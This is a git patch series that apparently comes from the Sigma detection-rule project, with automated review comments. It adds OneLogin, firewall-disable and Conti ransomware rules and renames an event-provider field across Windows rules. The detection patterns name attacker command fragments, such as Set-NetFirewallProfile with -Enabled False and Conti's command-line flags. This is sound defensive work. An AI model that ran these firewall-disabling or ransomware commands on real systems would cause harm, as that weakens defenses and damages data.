@@ -17,24 +17,24 @@ logsources: rewrite: product: windows service: powershell - # for the "classic" channel - ps_classic_start: + # for the "classic" channel + ps_classic_start: category: ps_classic_start product: windows conditions: EventID: 400 rewrite: product: windows - service: powershell-classic - ps_classic_provider_start: + service: powershell-classic + ps_classic_provider_start: category: ps_classic_provider_start product: windows conditions: EventID: 600 rewrite: product: windows - service: powershell-classic - ps_classic_script: + service: powershell-classic + ps_classic_script: category: ps_classic_script product: windows conditions: From 0bf9f1cfd6d69264098fbba7a2eed4a2059df9f3 Mon Sep 17 00:00:00 2001 From: austinsonger Date: Mon, 11 Oct 2021 21:03:48 -0500 Subject: [PATCH 1205/1367] Onelogin Rules --- .../onelogin_assumed_another_user.yml | 21 ++++++++++++++++ .../onelogin/onelogin_user_account_locked.yml | 24 +++++++++++++++++++ 2 files changed, 45 insertions(+) create mode 100644 rules/cloud/onelogin/onelogin_assumed_another_user.yml create mode 100644 rules/cloud/onelogin/onelogin_user_account_locked.yml diff --git a/rules/cloud/onelogin/onelogin_assumed_another_user.yml b/rules/cloud/onelogin/onelogin_assumed_another_user.yml new file mode 100644 index 00000000..869b6fa1 --- /dev/null +++ b/rules/cloud/onelogin/onelogin_assumed_another_user.yml @@ -0,0 +1,21 @@ +title: OneLogin User Assumed Another User +id: 62fff148-278d-497e-8ecd-ad6083231a35 +description: Detects when an user assumed another user account. +author: Austin Songer @austinsonger +status: experimental +date: 2021/10/12 +modified: 2021/10/12 +references: + - https://developers.onelogin.com/api-docs/1/events/event-resource +logsource: + service: onelogin.events +detection: + selection: + eventtypeid: + - 3 + condition: selection +level: low +tags: + - attack.impact +falsepositives: + - Unknown \ No newline at end of file 
diff --git a/rules/cloud/onelogin/onelogin_user_account_locked.yml b/rules/cloud/onelogin/onelogin_user_account_locked.yml new file mode 100644 index 00000000..32225dc0 --- /dev/null +++ b/rules/cloud/onelogin/onelogin_user_account_locked.yml @@ -0,0 +1,24 @@ +title: OneLogin User Account Locked +id: a717c561-d117-437e-b2d9-0118a7035d01 +description: Detects when an user acount is locked or suspended. +author: Austin Songer @austinsonger +status: experimental +date: 2021/10/12 +modified: 2021/10/12 +references: + - https://developers.onelogin.com/api-docs/1/events/event-resource/ +logsource: + service: onelogin.events +detection: + selection1: # Locked via API + eventtypeid: 532 + selection2: # Locked via API + eventtypeid: 553 + selection3: # Suspended via API + eventtypeid: 551 + condition: 1 of them +level: low +tags: + - attack.impact +falsepositives: + - System may lock or suspend user accounts. \ No newline at end of file From 0978ca92d86ad1f23573a80b42be5f76083fb851 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 11 Oct 2021 21:18:31 -0500 Subject: [PATCH 1206/1367] Update onelogin_assumed_another_user.yml --- rules/cloud/onelogin/onelogin_assumed_another_user.yml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/rules/cloud/onelogin/onelogin_assumed_another_user.yml b/rules/cloud/onelogin/onelogin_assumed_another_user.yml index 869b6fa1..fa6febcd 100644 --- a/rules/cloud/onelogin/onelogin_assumed_another_user.yml +++ b/rules/cloud/onelogin/onelogin_assumed_another_user.yml @@ -11,11 +11,10 @@ logsource: service: onelogin.events detection: selection: - eventtypeid: - - 3 + eventtypeid: 3 condition: selection level: low tags: - attack.impact falsepositives: - - Unknown \ No newline at end of file + - Unknown From 9faca2f3dc82a68dbdcb547b6666e499418eb17d Mon Sep 17 00:00:00 2001 
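Review bot: In onelogin_user_account_locked.yml, `selection1` and `selection2` both carry the comment `# Locked via API` although they match different event type ids (532 and 553); if these are distinct events, one comment is misleading — confirm against the referenced event-resource documentation and label each with its actual event name. Also `modified: 2021/10/12` equals `date:` on a brand-new rule; Sigma convention is to omit `modified` until the rule actually changes, and the same applies to onelogin_assumed_another_user.yml added in this commit.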
From: Austin Songer Date: Mon, 11 Oct 2021 22:54:05 -0500 Subject: [PATCH 1207/1367] Update onelogin_assumed_another_user.yml --- rules/cloud/onelogin/onelogin_assumed_another_user.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/onelogin/onelogin_assumed_another_user.yml b/rules/cloud/onelogin/onelogin_assumed_another_user.yml index fa6febcd..51fb2fd7 100644 --- a/rules/cloud/onelogin/onelogin_assumed_another_user.yml +++ b/rules/cloud/onelogin/onelogin_assumed_another_user.yml @@ -11,7 +11,7 @@ logsource: service: onelogin.events detection: selection: - eventtypeid: 3 + event_type_id: 3 condition: selection level: low tags: From d273bc25ea137d612165207db5c839dff1ef0d2b Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Tue, 12 Oct 2021 11:56:37 -0500 Subject: [PATCH 1208/1367] Create powershell_windows_firewall_disabled.yml --- .../powershell_windows_firewall_disabled.yml | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 rules/windows/powershell/powershell_script/powershell_windows_firewall_disabled.yml diff --git a/rules/windows/powershell/powershell_script/powershell_windows_firewall_disabled.yml b/rules/windows/powershell/powershell_script/powershell_windows_firewall_disabled.yml new file mode 100644 index 00000000..3d3a596b --- /dev/null +++ b/rules/windows/powershell/powershell_script/powershell_windows_firewall_disabled.yml 
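Review bot: The field rename `eventtypeid` → `event_type_id` in onelogin_assumed_another_user.yml is not applied to the sibling onelogin_user_account_locked.yml added two commits earlier, which still uses `eventtypeid` for 532/553/551; whichever spelling is correct for the `onelogin.events` log source, one of the two rules now targets a non-existent field and will never match. Apply the same rename there (`event_type_id: 532` and so on) so both rules agree.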
@@ -0,0 +1,27 @@ +title: Windows Firewall Profile Disabled +id: 488b44e7-3781-4a71-888d-c95abfacf44d +description: Detects when a user disables the Windows Firewall via a Profile to help evade defense. +status: experimental +author: Austin Songer @austinsonger +date: 2021/10/12 +references: +- https://docs.microsoft.com/en-us/powershell/module/netsecurity/set-netfirewallprofile?view=windowsserver2019-ps +- https://www.tutorialspoint.com/how-to-get-windows-firewall-profile-settings-using-powershell +- http://powershellhelp.space/commands/set-netfirewallrule-psv5.php +- http://woshub.com/manage-windows-firewall-powershell/ +logsource: + product: windows + service: powershell +detection: + selection: + CommandLine|contains|all: + - Set-NetFirewallProfile + - -Profile + - -Enabled + - 'False' + condition: selection +tags: +- attack.defense_evasion +level: high +falsepositives: +- Unknown From 40eed2ec59bc6678c9468b604056c307be039835 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Tue, 12 Oct 2021 11:57:37 -0500 Subject: [PATCH 1209/1367] Rename powershell_windows_firewall_disabled.yml to powershell_windows_firewall_profile_disabled.yml --- ...abled.yml => powershell_windows_firewall_profile_disabled.yml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename rules/windows/powershell/powershell_script/{powershell_windows_firewall_disabled.yml => powershell_windows_firewall_profile_disabled.yml} (100%) diff --git a/rules/windows/powershell/powershell_script/powershell_windows_firewall_disabled.yml b/rules/windows/powershell/powershell_script/powershell_windows_firewall_profile_disabled.yml similarity index 100% rename from rules/windows/powershell/powershell_script/powershell_windows_firewall_disabled.yml rename to rules/windows/powershell/powershell_script/powershell_windows_firewall_profile_disabled.yml From 37c637066bce692729e9197f6f8f514df524a5bc Mon Sep 17 00:00:00 2001 
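Review bot: powershell_windows_firewall_disabled.yml declares `logsource: product: windows / service: powershell` but its selection keys on `CommandLine`, a process-creation field that PowerShell logging events do not carry, so as written the rule is unlikely to ever match. The other `powershell_script` rules in this series (e.g. powershell_cl_invocation_lolscript_count.yml) use `EventID: 4104` with `ScriptBlockText|contains`; change the selection to `EventID: 4104` plus `ScriptBlockText|contains|all:` and add `definition: Script block logging must be enabled` under `logsource`. Requiring `-Profile` in the `all` list may also miss invocations that select profiles another way (the cmdlet accepts `-All`, if I recall its parameter set correctly) — consider moving `-Profile` out of the mandatory list or adding `-All` as an alternative. The `references:` and `tags:` list items are at column 0, unlike every other rule on this page; indent them two spaces for consistency.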
From: frack113 Date: Tue, 12 Oct 2021 20:57:12 +0200 Subject: [PATCH 1210/1367] add process_creation_conti_cmd_ransomware.yml --- .../process_creation_conti_cmd_ransomware.yml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 rules/windows/process_creation/process_creation_conti_cmd_ransomware.yml diff --git a/rules/windows/process_creation/process_creation_conti_cmd_ransomware.yml b/rules/windows/process_creation/process_creation_conti_cmd_ransomware.yml new file mode 100644 index 00000000..461cfb04 --- /dev/null +++ b/rules/windows/process_creation/process_creation_conti_cmd_ransomware.yml @@ -0,0 +1,29 @@ +title: Conti Ransomware Execution +id: 689308fc-cfba-4f72-9897-796c1dc61487 +status: experimental +author: frack113 +date: 2021/10/12 +description: Conti ransomware command line ioc +references: + - https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/ + - https://twitter.com/VK_Intel/status/1447795359900704769?t=Xz7vaLTvaaCZ5kHoZa6gMw&s=19 +tags: + - attack.impact + - attack.s0575 + - attack.t1486 +logsource: + category: process_creation + product: windows +detection: + selection: + CommandLine|contains|all: + - '-m ' + - '-net ' + - '-size ' #size 10 in references + - '-nomutex ' + - '-p \\' + - '$' + condition: selection +falsepositives: + - Unknown should be low +level: critical From 5aa62bd342dd7e60294b1ac89f772a2cff611401 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 12 Oct 2021 21:02:15 +0200 Subject: [PATCH 1211/1367] fix yml --- .../process_creation_conti_cmd_ransomware.yml | 58 +++++++++---------- 1 file changed, 29 insertions(+), 29 deletions(-) diff --git a/rules/windows/process_creation/process_creation_conti_cmd_ransomware.yml b/rules/windows/process_creation/process_creation_conti_cmd_ransomware.yml index 461cfb04..776c4d12 100644 --- a/rules/windows/process_creation/process_creation_conti_cmd_ransomware.yml 
+++ b/rules/windows/process_creation/process_creation_conti_cmd_ransomware.yml @@ -1,29 +1,29 @@ -title: Conti Ransomware Execution -id: 689308fc-cfba-4f72-9897-796c1dc61487 -status: experimental -author: frack113 -date: 2021/10/12 -description: Conti ransomware command line ioc -references: - - https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/ - - https://twitter.com/VK_Intel/status/1447795359900704769?t=Xz7vaLTvaaCZ5kHoZa6gMw&s=19 -tags: - - attack.impact - - attack.s0575 - - attack.t1486 -logsource: - category: process_creation - product: windows -detection: - selection: - CommandLine|contains|all: - - '-m ' - - '-net ' - - '-size ' #size 10 in references - - '-nomutex ' - - '-p \\' - - '$' - condition: selection -falsepositives: - - Unknown should be low -level: critical +title: Conti Ransomware Execution +id: 689308fc-cfba-4f72-9897-796c1dc61487 +status: experimental +author: frack113 +date: 2021/10/12 +description: Conti ransomware command line ioc +references: + - https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/ + - https://twitter.com/VK_Intel/status/1447795359900704769?t=Xz7vaLTvaaCZ5kHoZa6gMw&s=19 +tags: + - attack.impact + - attack.s0575 + - attack.t1486 +logsource: + category: process_creation + product: windows +detection: + selection: + CommandLine|contains|all: + - '-m ' + - '-net ' + - '-size ' #size 10 in references + - '-nomutex ' + - '-p \\' + - '$' + condition: selection +falsepositives: + - Unknown should be low +level: critical From 3d8002a2375bb838f9c0a70cf7a4a2221efdf20d Mon Sep 17 00:00:00 2001 
From: phantinuss Date: Wed, 13 Oct 2021 11:40:24 +0200 Subject: [PATCH 1212/1367] fix: Use 'Provider Name' for windows eventlog log sources --- rules/windows/builtin/win_audit_cve.yml | 4 ++-- rules/windows/builtin/win_event_log_cleared.yml | 4 ++-- rules/windows/builtin/win_rdp_potential_cve_2019_0708.yml | 4 ++-- .../windows/builtin/win_software_atera_rmm_agent_install.yml | 5 +++-- rules/windows/builtin/win_susp_backup_delete.yml | 3 ++- rules/windows/builtin/win_susp_dhcp_config.yml | 3 ++- rules/windows/builtin/win_susp_dhcp_config_failed.yml | 4 ++-- rules/windows/builtin/win_susp_eventlog_cleared.yml | 4 ++-- rules/windows/builtin/win_susp_msmpeng_crash.yml | 5 +++-- rules/windows/builtin/win_system_susp_eventlog_cleared.yml | 4 ++-- rules/windows/builtin/win_volume_shadow_copy_mount.yml | 5 +++-- rules/windows/builtin/win_vul_cve_2020_0688.yml | 4 ++-- tools/config/winlogbeat-modules-enabled.yml | 2 +- 13 files changed, 28 insertions(+), 23 deletions(-) diff --git a/rules/windows/builtin/win_audit_cve.yml b/rules/windows/builtin/win_audit_cve.yml index 74dcdfe7..822c5b3b 100644 --- a/rules/windows/builtin/win_audit_cve.yml +++ b/rules/windows/builtin/win_audit_cve.yml @@ -23,13 +23,13 @@ tags: - attack.t1499.004 author: Florian Roth date: 2020/01/15 -modified: 2020/08/23 +modified: 2021/10/13 logsource: product: windows service: application detection: selection: - Source: 'Microsoft-Windows-Audit-CVE' + Provider Name: 'Microsoft-Windows-Audit-CVE' condition: selection falsepositives: - Unknown diff --git a/rules/windows/builtin/win_event_log_cleared.yml b/rules/windows/builtin/win_event_log_cleared.yml index 992e3711..cac25a3c 100644 --- a/rules/windows/builtin/win_event_log_cleared.yml +++ b/rules/windows/builtin/win_event_log_cleared.yml 
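Review bot: `Provider Name: 'Microsoft-Windows-Audit-CVE'` in win_audit_cve.yml introduces a field name containing a space that the backends must resolve through the configs' field mappings, yet the diffstat shows only `tools/config/winlogbeat-modules-enabled.yml` being updated; any other backend config that previously mapped `Source` would leave `Provider Name` unmapped, and a converted query referencing a field that does not exist in the index would likely match nothing without an error. Please confirm that every config mapping `Source` now maps `Provider Name` as well (to winlogbeat's `winlog.provider_name`, if that is the intended target). The same applies to the other eleven rule hunks in this patch (win_event_log_cleared, win_rdp_potential_cve_2019_0708, win_software_atera_rmm_agent_install, win_susp_backup_delete, win_susp_dhcp_config, win_susp_dhcp_config_failed, win_susp_eventlog_cleared, win_susp_msmpeng_crash and the rest listed in the diffstat).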
@@ -5,7 +5,7 @@ description: Checks for event id 1102 which indicates the security event log was references: - https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityEvent/SecurityEventLogCleared.yaml date: 2021/08/15 -modified: 2021/10/08 +modified: 2021/10/13 author: Saw Winn Naung level: medium logsource: @@ -17,7 +17,7 @@ tags: detection: selection: EventID: 1102 - Source: Microsoft-Windows-Eventlog + Provider Name: Microsoft-Windows-Eventlog condition: selection fields: - SubjectLogonId diff --git a/rules/windows/builtin/win_rdp_potential_cve_2019_0708.yml b/rules/windows/builtin/win_rdp_potential_cve_2019_0708.yml index 20fef927..df8a9835 100644 --- a/rules/windows/builtin/win_rdp_potential_cve_2019_0708.yml +++ b/rules/windows/builtin/win_rdp_potential_cve_2019_0708.yml @@ -11,7 +11,7 @@ tags: status: experimental author: "Lionel PRAT, Christophe BROCAS, @atc_project (improvements)" date: 2019/05/24 -modified: 2020/08/23 +modified: 2021/10/13 logsource: product: windows service: system @@ -20,7 +20,7 @@ detection: EventID: - 56 - 50 - Source: TermDD + Provider Name: TermDD condition: selection falsepositives: - Bad connections or network interruptions diff --git a/rules/windows/builtin/win_software_atera_rmm_agent_install.yml b/rules/windows/builtin/win_software_atera_rmm_agent_install.yml index b3a7f22b..33a5a4da 100644 --- a/rules/windows/builtin/win_software_atera_rmm_agent_install.yml +++ b/rules/windows/builtin/win_software_atera_rmm_agent_install.yml @@ -5,6 +5,7 @@ description: Detects successful installation of Atera Remote Monitoring & Manage references: - https://www.advintel.io/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent date: 2021/09/01 +modified: 2021/10/13 author: Bhabesh Raj level: high logsource: 
@@ -15,8 +16,8 @@ tags: detection: selection: EventID: 1033 - Source: MsiInstaller + Provider Name: MsiInstaller Message|contains: AteraAgent condition: selection falsepositives: - - Legitimate Atera agent installation \ No newline at end of file + - Legitimate Atera agent installation diff --git a/rules/windows/builtin/win_susp_backup_delete.yml b/rules/windows/builtin/win_susp_backup_delete.yml index fc655911..4a8f9cb1 100644 --- a/rules/windows/builtin/win_susp_backup_delete.yml +++ b/rules/windows/builtin/win_susp_backup_delete.yml @@ -7,6 +7,7 @@ references: - https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100 author: Florian Roth (rule), Tom U. @c_APT_ure (collection) date: 2017/05/12 +modified: 2021/10/13 tags: - attack.defense_evasion - attack.t1107 # an old one @@ -17,7 +18,7 @@ logsource: detection: selection: EventID: 524 - Source: Microsoft-Windows-Backup + Provider Name: Microsoft-Windows-Backup condition: selection falsepositives: - Unknown diff --git a/rules/windows/builtin/win_susp_dhcp_config.yml b/rules/windows/builtin/win_susp_dhcp_config.yml index 4eb671a1..43cf46c4 100644 --- a/rules/windows/builtin/win_susp_dhcp_config.yml +++ b/rules/windows/builtin/win_susp_dhcp_config.yml @@ -7,6 +7,7 @@ references: - https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx - https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx date: 2017/05/15 +modified: 2021/10/13 author: Dimitrios Slamaris tags: - attack.defense_evasion @@ -18,7 +19,7 @@ logsource: detection: selection: EventID: 1033 - Source: Microsoft-Windows-DHCP-Server + Provider Name: Microsoft-Windows-DHCP-Server condition: selection falsepositives: - Unknown diff --git a/rules/windows/builtin/win_susp_dhcp_config_failed.yml b/rules/windows/builtin/win_susp_dhcp_config_failed.yml index fa66676a..8a5ae79a 100644 --- a/rules/windows/builtin/win_susp_dhcp_config_failed.yml 
+++ b/rules/windows/builtin/win_susp_dhcp_config_failed.yml @@ -7,7 +7,7 @@ references: - https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx - https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx date: 2017/05/15 -modified: 2019/07/17 +modified: 2021/10/13 tags: - attack.defense_evasion - attack.t1073 # an old one @@ -22,7 +22,7 @@ detection: - 1031 - 1032 - 1034 - Source: Microsoft-Windows-DHCP-Server + Provider Name: Microsoft-Windows-DHCP-Server condition: selection falsepositives: - Unknown diff --git a/rules/windows/builtin/win_susp_eventlog_cleared.yml b/rules/windows/builtin/win_susp_eventlog_cleared.yml index 02b08252..1e04e566 100644 --- a/rules/windows/builtin/win_susp_eventlog_cleared.yml +++ b/rules/windows/builtin/win_susp_eventlog_cleared.yml @@ -9,7 +9,7 @@ references: - https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100 author: Florian Roth date: 2017/01/10 -modified: 2021/10/08 +modified: 2021/10/13 tags: - attack.defense_evasion - attack.t1070 # an old one @@ -23,7 +23,7 @@ detection: EventID: - 517 - 1102 - Source: Microsoft-Windows-Eventlog + Provider Name: Microsoft-Windows-Eventlog condition: selection falsepositives: - Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog) diff --git a/rules/windows/builtin/win_susp_msmpeng_crash.yml b/rules/windows/builtin/win_susp_msmpeng_crash.yml index 8cc330fb..f3c6a18a 100644 --- a/rules/windows/builtin/win_susp_msmpeng_crash.yml +++ b/rules/windows/builtin/win_susp_msmpeng_crash.yml @@ -8,6 +8,7 @@ tags: - attack.t1562.001 status: experimental date: 2017/05/09 +modified: 2021/10/13 references: - https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5 - https://technet.microsoft.com/en-us/library/security/4022344 
@@ -17,10 +18,10 @@ logsource: service: application detection: selection1: - Source: 'Application Error' + Provider Name: 'Application Error' EventID: 1000 selection2: - Source: 'Windows Error Reporting' + Provider Name: 'Windows Error Reporting' EventID: 1001 keywords: - 'MsMpEng.exe' diff --git a/rules/windows/builtin/win_system_susp_eventlog_cleared.yml b/rules/windows/builtin/win_system_susp_eventlog_cleared.yml index c267a4a6..3a865550 100644 --- a/rules/windows/builtin/win_system_susp_eventlog_cleared.yml +++ b/rules/windows/builtin/win_system_susp_eventlog_cleared.yml @@ -11,7 +11,7 @@ references: - https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100 author: Florian Roth date: 2017/01/10 -modified: 2021/09/21 +modified: 2021/10/13 tags: - attack.defense_evasion - attack.t1070 # an old one @@ -23,7 +23,7 @@ logsource: detection: selection: EventID: 104 - Source: Microsoft-Windows-Eventlog + Provider Name: Microsoft-Windows-Eventlog condition: selection falsepositives: - Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog) diff --git a/rules/windows/builtin/win_volume_shadow_copy_mount.yml b/rules/windows/builtin/win_volume_shadow_copy_mount.yml index c7400389..0efcb797 100644 --- a/rules/windows/builtin/win_volume_shadow_copy_mount.yml +++ b/rules/windows/builtin/win_volume_shadow_copy_mount.yml @@ -3,6 +3,7 @@ id: f512acbf-e662-4903-843e-97ce4652b740 description: Detects volume shadow copy mount status: experimental date: 2020/10/20 +modified: 2021/10/13 author: Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR) tags: - attack.credential_access 
@@ -14,10 +15,10 @@ logsource: service: system detection: selection: - Source: Microsoft-Windows-Ntfs + Provider Name: Microsoft-Windows-Ntfs EventID: 98 DeviceName|contains: HarddiskVolumeShadowCopy condition: selection falsepositives: - Legitimate use of volume shadow copy mounts (backups maybe). -level: medium \ No newline at end of file +level: medium diff --git a/rules/windows/builtin/win_vul_cve_2020_0688.yml b/rules/windows/builtin/win_vul_cve_2020_0688.yml index 0ab65759..17ccba62 100644 --- a/rules/windows/builtin/win_vul_cve_2020_0688.yml +++ b/rules/windows/builtin/win_vul_cve_2020_0688.yml @@ -7,7 +7,7 @@ references: - https://cyberpolygon.com/materials/okhota-na-ataki-ms-exchange-chast-2-cve-2020-0688-cve-2020-16875-cve-2021-24085/ author: Florian Roth, wagga date: 2020/02/29 -modified: 2021/06/27 +modified: 2021/10/13 tags: - attack.initial_access - attack.t1190 @@ -17,7 +17,7 @@ logsource: detection: selection1: EventID: 4 - Source: MSExchange Control Panel + Provider Name: 'MSExchange Control Panel' Level: Error selection2: - '&__VIEWSTATE=' diff --git a/tools/config/winlogbeat-modules-enabled.yml b/tools/config/winlogbeat-modules-enabled.yml index f3c48790..ce706fb3 100644 --- a/tools/config/winlogbeat-modules-enabled.yml +++ b/tools/config/winlogbeat-modules-enabled.yml @@ -108,7 +108,7 @@ fieldmappings: EventID: event.code Channel: winlog.channel #Keywords: from "Value" is lost with winlogbeat exist in nxlog - provider name: winlog.provider_name + Provider Name: winlog.provider_name CallingProcessName: winlog.event_data.CallingProcessName ComputerName: winlog.ComputerName EventType: winlog.event_data.EventType From 1099d40473a14b9467cbe00cedf737d689c4dec1 Mon Sep 17 00:00:00 2001 
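Review bot: The field-mapping hunk only teaches the winlogbeat config the new `Provider Name` key while the twelve rules above stop using `Source`; the diffstat lists no other file under tools/config, so any other Windows backend config that mapped `Source` (not visible here) would now pass the literal field name through and the converted query would silently never match. Worth grepping tools/config for `Source:` mapping entries and adding a `Provider Name: ...` line beside each. Dropping the lowercase `provider name` key also removes the mapping for any rule still written that way; keeping `provider name: winlog.provider_name` next to the new key is a cheap compatibility guard, since as far as I can tell sigmac matches mapping keys literally and case-sensitively — confirm against the backend.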
From: phantinuss Date: Wed, 13 Oct 2021 13:04:11 +0200 Subject: [PATCH 1213/1367] rename the field 'Provider Name' to 'Provider_Name' --- rules/windows/builtin/win_audit_cve.yml | 2 +- rules/windows/builtin/win_event_log_cleared.yml | 2 +- rules/windows/builtin/win_rdp_potential_cve_2019_0708.yml | 2 +- .../windows/builtin/win_software_atera_rmm_agent_install.yml | 2 +- rules/windows/builtin/win_susp_backup_delete.yml | 2 +- rules/windows/builtin/win_susp_dhcp_config.yml | 2 +- rules/windows/builtin/win_susp_dhcp_config_failed.yml | 2 +- rules/windows/builtin/win_susp_eventlog_cleared.yml | 2 +- rules/windows/builtin/win_susp_msmpeng_crash.yml | 4 ++-- rules/windows/builtin/win_system_susp_eventlog_cleared.yml | 2 +- rules/windows/builtin/win_volume_shadow_copy_mount.yml | 2 +- rules/windows/builtin/win_vul_cve_2020_0688.yml | 2 +- tools/config/winlogbeat-modules-enabled.yml | 2 +- 13 files changed, 14 insertions(+), 14 deletions(-) diff --git a/rules/windows/builtin/win_audit_cve.yml b/rules/windows/builtin/win_audit_cve.yml index 822c5b3b..acb6c067 100644 --- a/rules/windows/builtin/win_audit_cve.yml +++ b/rules/windows/builtin/win_audit_cve.yml @@ -29,7 +29,7 @@ logsource: service: application detection: selection: - Provider Name: 'Microsoft-Windows-Audit-CVE' + Provider_Name: 'Microsoft-Windows-Audit-CVE' condition: selection falsepositives: - Unknown diff --git a/rules/windows/builtin/win_event_log_cleared.yml b/rules/windows/builtin/win_event_log_cleared.yml index cac25a3c..26deafd0 100644 --- a/rules/windows/builtin/win_event_log_cleared.yml +++ b/rules/windows/builtin/win_event_log_cleared.yml @@ -17,7 +17,7 @@ tags: detection: selection: EventID: 1102 - Provider Name: Microsoft-Windows-Eventlog + Provider_Name: Microsoft-Windows-Eventlog condition: selection fields: - SubjectLogonId diff --git a/rules/windows/builtin/win_rdp_potential_cve_2019_0708.yml b/rules/windows/builtin/win_rdp_potential_cve_2019_0708.yml index df8a9835..0ffb293a 100644 
--- a/rules/windows/builtin/win_rdp_potential_cve_2019_0708.yml +++ b/rules/windows/builtin/win_rdp_potential_cve_2019_0708.yml @@ -20,7 +20,7 @@ detection: EventID: - 56 - 50 - Provider Name: TermDD + Provider_Name: TermDD condition: selection falsepositives: - Bad connections or network interruptions diff --git a/rules/windows/builtin/win_software_atera_rmm_agent_install.yml b/rules/windows/builtin/win_software_atera_rmm_agent_install.yml index 33a5a4da..5c38131a 100644 --- a/rules/windows/builtin/win_software_atera_rmm_agent_install.yml +++ b/rules/windows/builtin/win_software_atera_rmm_agent_install.yml @@ -16,7 +16,7 @@ tags: detection: selection: EventID: 1033 - Provider Name: MsiInstaller + Provider_Name: MsiInstaller Message|contains: AteraAgent condition: selection falsepositives: diff --git a/rules/windows/builtin/win_susp_backup_delete.yml b/rules/windows/builtin/win_susp_backup_delete.yml index 4a8f9cb1..b7b91a54 100644 --- a/rules/windows/builtin/win_susp_backup_delete.yml +++ b/rules/windows/builtin/win_susp_backup_delete.yml @@ -18,7 +18,7 @@ logsource: detection: selection: EventID: 524 - Provider Name: Microsoft-Windows-Backup + Provider_Name: Microsoft-Windows-Backup condition: selection falsepositives: - Unknown diff --git a/rules/windows/builtin/win_susp_dhcp_config.yml b/rules/windows/builtin/win_susp_dhcp_config.yml index 43cf46c4..8b5b0feb 100644 --- a/rules/windows/builtin/win_susp_dhcp_config.yml +++ b/rules/windows/builtin/win_susp_dhcp_config.yml @@ -19,7 +19,7 @@ logsource: detection: selection: EventID: 1033 - Provider Name: Microsoft-Windows-DHCP-Server + Provider_Name: Microsoft-Windows-DHCP-Server condition: selection falsepositives: - Unknown diff --git a/rules/windows/builtin/win_susp_dhcp_config_failed.yml b/rules/windows/builtin/win_susp_dhcp_config_failed.yml index 8a5ae79a..dbb4ca85 100644 --- a/rules/windows/builtin/win_susp_dhcp_config_failed.yml +++ b/rules/windows/builtin/win_susp_dhcp_config_failed.yml 
@@ -22,7 +22,7 @@ detection: - 1031 - 1032 - 1034 - Provider Name: Microsoft-Windows-DHCP-Server + Provider_Name: Microsoft-Windows-DHCP-Server condition: selection falsepositives: - Unknown diff --git a/rules/windows/builtin/win_susp_eventlog_cleared.yml b/rules/windows/builtin/win_susp_eventlog_cleared.yml index 1e04e566..17d5e4b9 100644 --- a/rules/windows/builtin/win_susp_eventlog_cleared.yml +++ b/rules/windows/builtin/win_susp_eventlog_cleared.yml @@ -23,7 +23,7 @@ detection: EventID: - 517 - 1102 - Provider Name: Microsoft-Windows-Eventlog + Provider_Name: Microsoft-Windows-Eventlog condition: selection falsepositives: - Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog) diff --git a/rules/windows/builtin/win_susp_msmpeng_crash.yml b/rules/windows/builtin/win_susp_msmpeng_crash.yml index f3c6a18a..a128d21d 100644 --- a/rules/windows/builtin/win_susp_msmpeng_crash.yml +++ b/rules/windows/builtin/win_susp_msmpeng_crash.yml @@ -18,10 +18,10 @@ logsource: service: application detection: selection1: - Provider Name: 'Application Error' + Provider_Name: 'Application Error' EventID: 1000 selection2: - Provider Name: 'Windows Error Reporting' + Provider_Name: 'Windows Error Reporting' EventID: 1001 keywords: - 'MsMpEng.exe' diff --git a/rules/windows/builtin/win_system_susp_eventlog_cleared.yml b/rules/windows/builtin/win_system_susp_eventlog_cleared.yml index 3a865550..be029b51 100644 --- a/rules/windows/builtin/win_system_susp_eventlog_cleared.yml +++ b/rules/windows/builtin/win_system_susp_eventlog_cleared.yml @@ -23,7 +23,7 @@ logsource: detection: selection: EventID: 104 - Provider Name: Microsoft-Windows-Eventlog + Provider_Name: Microsoft-Windows-Eventlog condition: selection falsepositives: - Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog) 
